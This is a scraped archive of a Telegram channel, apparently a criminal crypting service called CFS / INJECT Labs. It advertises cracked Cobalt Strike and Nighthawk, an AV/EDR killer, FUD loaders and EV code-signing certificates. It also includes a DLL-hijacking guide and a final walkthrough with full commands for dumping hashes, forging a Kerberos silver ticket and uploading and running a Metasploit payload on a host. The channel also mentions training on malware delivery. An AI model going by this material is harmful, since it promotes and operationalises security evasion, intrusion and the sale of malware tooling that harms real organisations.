fa
Feedback
CFS - CRYPT FILE SERVICE x DSAS by INJECT [Labs]

CFS - CRYPT FILE SERVICE x DSAS by INJECT [Labs]

رفتن به کانال در Telegram

🚩 Channel was restricted by Telegram

نمایش بیشتر
اطلاعاتی وجود ندارد
مشترکین
-524 ساعت
+47 روز
+6530 روز
آرشیو پست ها
EDRs Agents 500💵 - CrowdStrike - SentinelOne - FortinetEDR

We would also like to tell you what software you can purchase in our service. - CORE IMPACT v21.6 - 3800💵 - METASPLOIT PRO - 2200💵 - SHELLTER PRO v10 - 5400💵 - EXPLOIT PACK PRO v18.04 - 3000💵 - NIGHTHAWK v0.3 - 16000💵 - BRUTE RATEL v2.1.2 - 4500💵 - NESSUS (Expert/Professional) - 3000💵 - CHECKMARX [CxCodebashing / CxIAST / CxOSA] - 1500💵 - COBALT-STRIKE 4.9.1 [ modify ARSENAL KIT + Bypass AV/EDR BOX ] - 4000💵 - COBALT-STRIKE 4.11 (LATEST) + Arsenal Kit ( Available Self-Written Cobalt Strike Artifacts. - x86/64, - .exe/dll, - Custom syscall gate, asm stabs, - Inject. 5000💵 When used correctly - FUD for more than six months without cleaning ) 🙎🏻‍♂️ Contacts: ▫️Telegram: https://t.me/Evi1Grey5 Telegram channel: https://t.me/injectcrypt ▪️Website: injectexp.dev ▪️Forum: pro.injectexp.dev ▪️Email: injectexpdev@proton.me ▫️Tox: 340EF1DCEEC5B395B9B45963F945C00238ADDEAC87C117F64F46206911474C61981D96420B72 ▫️Session: 0581af1f006c3eb8d735046e515c9a9ffd3a1caf37eae5852f8184e6c439bada31

🖥 Dll Hijacking https://www.exploit-db.com/exploits/14734 An "exploit" aimed at dwmapi.dll We can use hijacking with almost
🖥 Dll Hijacking https://www.exploit-db.com/exploits/14734 An "exploit" aimed at dwmapi.dll We can use hijacking with almost any legitimate software. ▫️First of all, the known DLLs are checked. Then the folder where the EXE is located is checked ▪️ We take almost any white software ▪️ Looking at the imports ▪️ We run it with a debugger on LoadLibraryA+W ▪️ Making a list of downloads ▫️Then we exclude from it those that are in well-known libraries, and we get a fairly extensive list of dll files for hijacking. We get into the debugger, put the tags on all exported functions of all dll's, run through the code and make a list of called functions. ‘’’// version.dll -> GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW // TeamViewer_Resource.dll // wtsapi32.dll // msimg32.dll // dwmapi32.dll // userenv32.dll // tv.dll // Secur32.dll // Netapi32.dll // wintrust.dll -> WinVerifyTrust // iphlpapi.dll // winsta.dll // uxtheme.dll // SHFolder.dll‘’’ ▫️Next, we write a dll and export a self-made function (you can also use arguments and check them) ▫️Another option: to ship the dll used by the white software to the dll, for example gdi32.dll then put the EAT hook on the conditional GetStockObject -> white software calling a function from gdi32 will call our code 🤐And launching a dll without this legit software or through rundll32 will not launch a payload.

🆕 In this short article, I would like to share my experience of exploiting 1-day vulnerabilities in native Windows component
🆕 In this short article, I would like to share my experience of exploiting 1-day vulnerabilities in native Windows components - its drivers. Based on 4 vulnerabilities in appid.sys , csc.sys , afd.sys , ks.sys . For CVE-2024-26229, CVE-2024-35250, and CVE-2024-21338, I have published PoC's that have been added or are in line to be added to post-exploitation frameworks such as Cobalt Strike, Brute Ratel, Metasploit Framework, and other tools. For CVE-2023-21768, the PoC was published by other researchers, but I decided to include this vulnerability in the report due to differences in exploitation approaches. Using her example, three LPE techniques will be described, which will be used in the future. The following types of vulnerabilities will be presented. https://teletype.in/@evi1grey5/f5Uq6cHQKj4

🆕 Sell: Costume Artifact Kit Cobalt Strike & UDRL & LDR src code FUD Improved set of Cobalt Strike artifacts and reflection loaders. These efforts have made significant progress in the fight against EDR, XDR and AVs. The functionality is still reliable. You can change the hashes and linkers to make it undetectable again if it is detected. Key features include: - Loaders of polymorphic reflections - Debugging protection - Fully customizable from scratch - Custom Clang Compiler - LLVM obfuscation

We would also like to tell you what software you can purchase in our service. - CORE IMPACT v21.6 - 3800💵 - METASPLOIT PRO - 2200💵 - SHELLTER PRO v10 - 5400💵 - EXPLOIT PACK PRO v18.04 - 3000💵 - NIGHTHAWK v0.3 - 16000💵 - BRUTE RATEL v2.1.2 - 4500💵 - NESSUS (Expert/Professional) - 3000💵 - CHECKMARX [CxCodebashing / CxIAST / CxOSA] - 1500💵 - COBALT-STRIKE 4.9.1 [ modify ARSENAL KIT + Bypass AV/EDR BOX ] - 4000💵 - COBALT-STRIKE 4.11 (LATEST) + Arsenal Kit ( Available Self-Written Cobalt Strike Artifacts. - x86/64, - .exe/dll, - Custom syscall gate, asm stabs, - Inject. 5000💵 When used correctly - FUD for more than six months without cleaning ) 🙎🏻‍♂️ Contacts: ▫️Telegram: https://t.me/Evi1Grey5 Telegram channel: https://t.me/injectcrypt ▪️Website: injectexp.dev ▪️Forum: pro.injectexp.dev ▪️Email: injectexpdev@proton.me ▫️Tox: 340EF1DCEEC5B395B9B45963F945C00238ADDEAC87C117F64F46206911474C61981D96420B72 ▫️Session: 0581af1f006c3eb8d735046e515c9a9ffd3a1caf37eae5852f8184e6c439bada31

March 2025 - Cobalt Strike 4.11 ------------- + Updated BeaconGetSyscallInformation API (breaking change with previous versio
March 2025 - Cobalt Strike 4.11 ------------- + Updated BeaconGetSyscallInformation API (breaking change with previous versions). + Added "http-post" malleable C2 group options to control the size of parts of the POST response to bypass Data Exfiltration Prevention solutions and process responses faster. Use the "client_max_post_post_size" option to reduce the maximum posting size. Decreasing this this will cause HTTP posted data (with the POST verb) to be chucked into multiple smaller requests. Use the "client_max_post_get_size" option to control the size of chucked data (data sent per request) when beacon is posting with a GET verb into an HTTP Header. Increasing this size can speed up downloads and create less HTTP posting GET verb requests that are larger. Use the "client_max_post_get_packet" option to control the amount of file download data that a beacon can process during one cycle (check-in) when using HTTP Posts with the GET verb. Increasing this size can speed up downloads, but will create more HTTP post requests per cycle. + Added support for multiple hosts to beacon_config command. + Added DNS Over HTTPS (DOH) support to DNS beacons. Configuration is available in the "dns-beacon" malleable C2 section. The default option to enable the feature is set with the "comm_mode" malleable C2 option. Other DOH configuration options are available in the "dns-over-https" malleable C2 group. You can choose to override the default DOH enabled option when generating payloads from the UI or Aggressor scripts. + Overhaul default sleep mask so beacon/sleepmask are both automatically masked with proprietary evasion code. This applies to HTTP, HTTPS and DNS Beacons. + Updated the cobalt strike client to support the new bread_pipe aggressor function, which can be used to task beacon to read from the specified pipe name. + Added ability to run multiple BOFs asynchronously without blocking beacon. This ability is being released via the Arsenal Kit Postex Kit. + Update the bread_pipe aggressor function to support reading from the pipe that supports read_postex_kit_blob_from_pipe format. + Added support for additional Nt* API to Function/Syscall Resolution in the prepend loader, Beacon, and Aresenal Kit. + Added new default process injection method in Beacon. + Make prepend reflective loader the default loader used by Beacon. Added "stage.rdll_loader" malleable c2 option to use prepend (default) or stomp loader. + Use indirect system calls in prepend reflective loader by default. Added "stage.rdll_use_syscalls" malleable c2 option to disable system calls. + Changed "stage.obfuscate" behaviour to decouple copying the PE Header into the final beacon memory. The "stage.copy_pe_header" option will perform that. Added "stage.transform-obfuscate" which allows the user to use transformations to obfuscate the beacon dll payload for the prepend loader. + The prepend reflective loader will resolve system calls and pass to them Beacon via beacon user data (BUD). + Add support to handle fake PEB entries and EAT Protections with "stage.eaf_bypass" option. + Changed some default options in .stage malleable C2: sleep_mask :true transform-obfuscate: { xor 32 } cleanup : true + Add Client console option for wrapping long text lines on word breaks. + Change selected beacon console tab to switch as beacon table selected beacon changes. + Add options for copying data easier from Credentials list. + Add options to organise the output of the help command into groups to make things easier to find. See "help help" in the beacon and SSH consoles. Added "beacon_command_group" and "ssh_command_group" aggressor commands to define custom command help groups. Added help group ID parameter to "beacon_command_register" and "ssh_command_register" aggressor commands for linking commands to help groups. + Changed Client consoles to position at the bottom when opening. + Added Console Buffer Size - Preferences option to allow more console data before truncation occurs.

Cobalt Strike 4.11 is out now! This release introduces a novel Sleepmask, a novel process injection technique, a new prepend
Cobalt Strike 4.11 is out now! This release introduces a novel Sleepmask, a novel process injection technique, a new prepend reflective loader with new evasive options, asynchronous BOFs, DNS over HTTPs and more! https://www.cobaltstrike.com/blog/cobalt-strike-411-shh-beacon-is-sleeping

We would also like to tell you what software you can purchase in our service. - CORE IMPACT v21.6 - 3800💵 - METASPLOIT PRO - 2200💵 - SHELLTER PRO v10 - 5400💵 - EXPLOIT PACK PRO v18.04 - 3000💵 - NIGHTHAWK v0.3 - 16000💵 - BRUTE RATEL v2.1.2 - 4500💵 - NESSUS (Expert/Professional) - 3000💵 - CHECKMARX [CxCodebashing / CxIAST / CxOSA] - 1500💵 - COBALT-STRIKE 4.9.1 [ modify ARSENAL KIT + Bypass AV/EDR BOX ] - 4000💵 - COBALT-STRIKE 4.10.1 (LATEST) + Arsenal Kit ( Available Self-Written Cobalt Strike Artifacts. - x86/64, - .exe/dll, - Custom syscall gate, asm stabs, - Inject. When used correctly - FUD for more than six months without cleaning )

What We Going To Cover: 1. Callback code execution. 2. Local mapping injections. 3. Remote mapping injection 4. Local Functio
What We Going To Cover: 1. Callback code execution. 2. Local mapping injections. 3. Remote mapping injection 4. Local Function Stomping Injcetion. 5. PPID Spoofing. https://telegra.ph/Antivirus-Evasion-Part-52-03-17

We have completed the next "KILL AV/EDR 2" training, thanks to everyone who took part. A link to download the video material of this course will be available later. Also, with our question and the survey about "MALWARE distribution methods", we will most likely make a manual, or anyone who wants to learn the methods and learn how to use them can write to us and go through it individually. We don't see the point in creating a lot of training on this topic. Thanks again.

CFS payload and bypass all major XDR / EDR, the input / output can be .exe / ddll / bin / ps1 any file native / .net x64 / x86, POC Crowdstrike Falcon Sensor EDR

To all those who have purchased Nighthawk 0.3.3 from us, we would like to please you. Appeared crack. Write to us, we will issue it and help with the installation 💪

What We Going To Cover: 1. Callback code execution. 2. Local mapping injections. 3. Remote mapping injection 4. Local Functio
What We Going To Cover: 1. Callback code execution. 2. Local mapping injections. 3. Remote mapping injection 4. Local Function Stomping Injcetion. https://telegra.ph/Antivirus-Evasion-5-03-15

Today, our first day of "KILL AV/EDR 2" training is coming to an end and many trainees have a question. Should we make a manual or should there be training on the delivery of malware, that is, to sort out what relevant methods we have for 2025?!
Anonymous voting

3 Certificates Available

🖥 Today we will first talk about an new way to run our shellcode without using or creating an new thread. this approach will
🖥 Today we will first talk about an new way to run our shellcode without using or creating an new thread. this approach will called an APC injections https://telegra.ph/Antivirus-Evasion-4-03-13

We are pleased to introduce our first AV/EDR cryptor and killer. Technical information: ▪️ The product is compatible with Win
We are pleased to introduce our first AV/EDR cryptor and killer. Technical information: ▪️ The product is compatible with Windows OS: Support for Win7 (Server 2008R2) ~ Win11 (Server 2025). ▪️ Protected processes can be deleted without any warnings or alarms. No administrator rights are required. The product is signed by a reliable supplier, not by some random certificate. The tool is convenient and easy to use. No system reboot is required. In case of reboot or shutdown, the EDR or AV will be disabled. ▫️Actual software support tested ▪️Cortex. ▪️Crowdstrike. ▪️Sentinel One. ▪️Sophos XDR Intercept X. ▪️Bitdefender EDR. ▪️Eset business edition (EDR). ▪️Avira. ▪️McAfee. ▪️Windows Defender. Support for bypassing other EDRS/AV. ▫️Use case ▪️Eliminate the hassle of paid encryption. After deploying the tool, you can run whatever you want. ▪️Disable the AV and EDR systems with a few commands, gaining full control of the machine. ▪️All EDR processes are terminated automatically. ▫️License ▪️Resale or public distribution of this tool is strictly prohibited. ▪️The software is sold separately. Distribution or sharing of the software is not allowed. ⤴️The release of CFS KILLER is scheduled for March 22. ▪️The pre-order price is $3,000 / The price on the day of release is $5,500. ▫️Support ▪️Support includes an update for the license period. License: 3 months / 6 months / 1 year. ▪️Round-the-clock support for the tool.

EV by GlobalSign - 1800💵 (in stock, exp. in 1 year) Full transfer of all data from the registrant’s personal account and emails. You can use your own hardware token to install the certificate. ➡️We protect your privacy, no cloud signatures ➡️All certificates are new, valid for 1 year, sold per person and each certificate is issued on a separate account.

Remote NTLM Relay preparation: Lateral Movement without NTLM and 445/TCP In the course of solving one of the networks on a we
+2
Remote NTLM Relay preparation: Lateral Movement without NTLM and 445/TCP In the course of solving one of the networks on a well-known platform, a situation may arise that I have encountered. Having privileged access to the server, which will later be used for Remote NTLM Relay, I turned off the NetLogon, LanmanServer and LanmanWorkstation services without a second thought and rebooted the machine, forgetting to gain a foothold on it with the built-in tools of the post-exploitation framework. I did it this way: sc stop netlogon sc stop lanmanserver sc config lanmanserver start= disabled sc stop lanmanworkstation sc config lanmanworkstation start= disabled After restarting the host, I made sure that port 445 was not being listened to by the server (nmap -p 445 -sT -Pn <serverIP>), after which I decided to continue the attack, but faced an obvious problem: I could not authenticate on the server and, therefore, run the binary file necessary for organizing port forwarding. We have 2 problems: 1⃣ NetLogon, LanmanServer, and LanmanWorkstation services are not working, which means that you will not be able to authenticate to the target server using NTLM; 2⃣ The SMB port, which is necessary for most of the Impacket utilities, is not working. used for Remote NTLM Re The solution is pretty obvious. Instead of NTLM, we can use Kerberos, since we are located in the domain infrastructure. It's not for nothing that after gaining system access to the attacked server, we dumped its LSA secrets? And instead of the standard scripts from the Impacket suite, you can use their "pro variations" that do not require access to port 445 of the target server. ed the machine, forgetting to ▫️Step 1. Silver Ticket The first step is shown for demonstration purposes in order to see the password hash of the account of the attacked server. Let me remind you that we got it earlier by dumping LSA secrets on the server itself.
proxychains impacket-secretsdump holo.live/Administrator@10.201.126.30 -hashes :<redacted> -just-dc-user 'PC-FILESRV01$'

...
PC-FILESRV01$:1120:aad3b435b51404eeaad3b435b51404ee:e66f5cf1a026516d1d2220130d8d13c4
▫️To carry out the attack, we need the domain SID, which we will get using the impacket-lookupsid script from the Impacket set (in this case, we use the Pass-the-Hash technique with respect to the domain controller):
proxychains impacket-lookupsid HOLO.LIVE/'PC-FILESRV01$'@10.201.126.30 -hashes :e66f5cf1a026516d1d2220130d8d13c4

We get the domain SID:
 S-1-5-21-471847105-3603022926-1728018720
▫️After receiving the SID, we start crafting a Silver Ticket to gain privileged access to the target server. The path to the received ticket is written to the environment variable KRB5CCNAME:
proxychains impacket-ticketer -nthash e66f5cf1a026516d1d2220130d8d13c4 -domain-sid S-1-5-21-471847105-3603022926-1728018720 -dc-ip 10.201.126.30 -domain holo.live -spn HOST/PC-FILESRV01.holo.live 'watamet'

export KRB5CCNAME=watamet.ccache
▪️Step 2. ATExec Pro After that, with the help of what we know atexec-pro.py after receiving the ticket, we get access to the target server and launch our C2 agent (for example, MSF is used here):
proxychains python3 atexec-pro.py PC-FILESRV01.holo.live -k -no-pass -dc-ip 10.201.126.30

Inside the shell:
ATShell (@PC-FILESRV01.holo.live)> upload /root/THM/Holo/binaries/msf_win_x64.exe C:\Windows\Tasks\msf.exe
ATShell (@PC-FILESRV01.holo.live)> C:\Windows\Tasks\msf.exe
You can see the same steps step by step in the attached screenshots. 1⃣ Getting the domain SID using impacket-lookupsid; 2⃣ Create a Silvet Ticket using impacket-ticketer for privileged access to the target host; 3⃣ Gaining access to the target host using atexec-pro.py using a previously received ticket (I pay attention to the ProxyChains log, where there is no connection to port 445).